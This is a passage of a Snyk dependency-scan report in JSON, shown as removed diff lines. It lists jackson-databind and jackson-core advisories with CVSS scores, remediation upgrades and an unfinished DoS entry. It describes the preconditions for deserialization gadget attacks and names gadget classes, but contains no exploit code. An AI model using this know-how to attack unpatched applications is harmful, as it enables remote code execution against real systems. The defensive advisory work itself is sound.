"2024-03-11T09:46:43.143163Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "cvssV3BaseScore": 6.8, - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.565013Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.85710", - "probability": "0.01257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14721" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9mxf-g3x6-wv74" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:25:40.161831Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:24:46Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:24:39Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.774444Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.100058Z" 
- }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.690019Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19362" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c8hm-7hpq-7jhg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:19.256477Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.043196Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.593938Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19360" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f9hv-mg5h-xcw9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:23.673097Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:34.457712Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.548577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19361" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx9v-gmh4-mgqw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:31.715185Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:43Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.091904Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Alessio Soldano" - ], - "semver": { - "vulnerable": [ - "[,2.8.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", - "className": "UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", - "className": "ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/pull/322", - "title": "GitHub PR" - }, - { - "url": "https://issues.jboss.org/browse/JBEAP-6316", - "title": "Jira Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - 
"cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:01.546686Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
